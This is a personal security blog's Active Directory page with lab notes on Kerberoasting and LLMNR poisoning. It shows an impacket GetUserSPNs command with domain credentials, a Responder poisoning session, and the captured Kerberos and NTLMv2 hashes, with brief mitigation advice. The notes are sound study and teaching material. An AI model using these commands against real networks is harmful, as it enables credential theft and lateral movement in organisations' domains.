0xk4k45h1
Active Directory
Kerberoast
LLMNR poisoning
SMB relay
CTF
0xL4ugh 2024
ICMTC Qualification 2024
PortSwigger
Wani CTF 2024
HackTheBox
Machines
Devvortex
Drive
PC
Visual
Sherlock
Home
Contact
Copyright © 2024 |
Yankos
Home
> Active Directory
Now Loading ...
Active Directory
Kerberoast
Kerberoast This attack is a form of Lateral Movement in Active Directory Once You get any credentials in the domain, Do Kerberoasting !! but who is the target now ? It’s done againest any service account exploiting TGS creation mechanism, TGS : Ticket Granting Service This ticket is sent to the user who wants to access a specific service when this user provide the TGT The TGS is encrypted using the hash of the service, so you can try cracking it offline to get the password of the service Note : If there’s a port number in the SPN make sure that u remove it from the hash you get We use GetUserSPNs.py from impacket example usage ┌──(youssif㉿youssif)-[/usr/share/doc/python3-impacket/examples] └─$ python ./GetUserSPNs.py -dc-ip 192.168.2.129 rift.local/abdo:abdo123 -request Impacket v0.11.0 - Copyright 2023 Fortra Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ------------------------------------ ---------- -------- -------------------------- --------- ---------- NINJA-DC/SQLService.rift.local:60001 SQLService 2024-02-16 10:27:07.970505 <never> [-] CCache file is not found. Skipping... $krb5tgs$23$*SQLService$RIFT.LOCAL$rift.local/SQLService*$8953860704b1ee9e903ebfd13994127a$cb4559b82bac5bbb6fbdb6cbb0a59e7f0b63c4876b57b6bff24e39437b117aa8c5e1068b20fa2e98db8985d2bdf03ac4c47c53ca5abe4f620f10dd7def738f1b86c9af44fd28e5a23ca9104c7e1fa8dd79c06a626a7bba50ec14e68e553193be29b9e2059823f978cff43a029855c49885e101afdb5f006f987f9af300579f53b900acf1b2306e43ee8b726f463927c5863f39d3d58151d4d07ed745b43ba1106033eedef86a4eb2a0b228592a5038f3c523c608e95cebfed3f5eaa53411abe772c7fba6cae95e3e79a0d4250dc423aad2b6e2f45f2cf28733940b5d890e218ebee0c5d85ededa76e2a847bf101859a7c88e48721535fcb2f70e90c8810b433ebf8122d68b6794bf61a2a9346d96a0eaed7c82ea7ec8f8b488b9e9d5abc4b65d448de3e6791b53ec3d334ca005c640831b3e0aa6763e8cb96c206297f456c32ba51eaacc965a24e5ca4bddb92ea8d899470ea6b610f731bcc69b6df783a508b7396c3332ac085ec3cadbd8b34120fd2b81a192b0038f0d4d1356084b2a5976637fc6044a32e4b44f3278f1d006e47bde087aff1d52fc2cd5d9821a5849399130820860715dd7679d3d3575c015e127e93bed00012f92d041dca62abc18e56ecec99c1cfb01a08c6771bad888482089cf36333dd5b0b690a00fd248f131736e2eca4aa5f214e42fc540e43d55d3fd0350a39b03ee3606a4ab8a6985c00c2e43abe7e72250a9ddb21cd91861bc9b6ded2fe1410db0a744d89a61bdf3b19b1ce82e711696db3dcd0e7fe7fc8ef82d5b272152b6f8cbf06bb277e563cacbda406c8913f2848701cb7f5ef1999b358e31342fab00d71b4cf2c5828f50970390e041f7f74296bcf032ba7421f6a024b046f9fe44d7defd7f626eb4209ae05a62aaed3818f4dc17fc28136c3808c501361ed0f1ac7c4e677301d2c41639b26618ec9c8f07d3f88ed66eeaac94d53429232447ffbe33a8325649c07f7c44dffd8031c7bf4acb484915b5697c3fea356010e1f23555224e63ff1b315d8d11db5bd9f4be99da17b373bbaf6ab98945f0935e5d6f50feefbcc25227c43484cdb72c81e307cbece137307b8b0c51e3acdaec3c3f941de4cbebad5fd7aab2a139d0e43692b0cffafba2e7841d48ad0147014952f7df92f3003b2475f5bd08e52b1bbdea8545ed096dcb3369ca92777bd515283e7d2aaccc9d83aae1c9fd44f6608d381c7613052bdc8110bed85c97ba79bf9fb8ffe7f8525949a28299b78eb85eb0f2681ec9 Mitigation Mitigation is simple Use Strong Passwords (Hard to be cracked) Make sure the service accounts has the least privilages (Not an Admin as example)
Active Directory
· 2024-06-21
SMB relay
Active Directory
· 2024-02-17
LLMNR Poisoning
What is LLMNR The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link. The flaw occurs cuz of using user’s name and NLTMv2 hash in reponding. LLMNR Poisoning when trying to access smb share for example the computer makes the following steps: Check local cache for the record and if no record existing Send DNS query to the DNS server and the problem occurs here if the DNS server couldn’t find the file because The computer(victim) sends LLMNR query as broadcast The responder(Man in the middle) here will get the name and the NLTMv2 hash of the victim to respond As an attacker you can try cracking the NLTMv2 Hash using tool like hashcat LLMNR poisoning is an attack where a malicious actor listens for LLMNR requests and responds with their own IP address (or another IP of their choosing) to redirect the traffic. In our discussion we will use a tool called Responder to perform the role of the MITM which will get the name & hash and respond to the victim ┌──(youssif㉿youssif)-[~] └─$ sudo responder -I eth0 [sudo] password for youssif: sudo: a password is required ┌──(youssif㉿youssif)-[~] └─$ sudo responder -I eth0 [sudo] password for youssif: __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.3.0 To support this project: Patreon -> https://www.patreon.com/PythonResponder Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [eth0] Responder IP [192.168.126.135] Responder IPv6 [fe80::9857:69cd:4087:1b54] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Current Session Variables: Responder Machine Name [WIN-NSDPQOYEW3Q] Responder Domain Name [HK3L.LOCAL] Responder DCE-RPC Port [49090] [+] Listening for events... Now the responder is set Let’s go to the victim and try accessing the responder IP from the victim machine as shown below When we look again at the responder we will find this [SMB] NTLMv2-SSP Client : 192.168.126.151 [SMB] NTLMv2-SSP Username : RIFT\jax [SMB] NTLMv2-SSP Hash : jax::RIFT:98bf26eff5a881f0:F2DD5C0A89CB1502E76F0C5B037915E4:0101000000000000800DF383E561DA01FB1EB125814EEC34000000000200080048004B0033004C0001001E00570049004E002D004E0053004400500051004F005900450057003300510004003400570049004E002D004E0053004400500051004F00590045005700330051002E0048004B0033004C002E004C004F00430041004C000300140048004B0033004C002E004C004F00430041004C000500140048004B0033004C002E004C004F00430041004C0007000800800DF383E561DA0106000400020000000800300030000000000000000100000000200000265F3E95F8F6700FA285D50194F0F4018C8BD4937F07A6298F296D9AE7D0EDD30A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100320036002E003100330035000000000000000000 As an attacker, u got the NTLMv2 Hash and you can try cracking it. You can also use the hash without cracking in other attacks.
Active Directory
· 2024-02-17
<
>
Touch background to close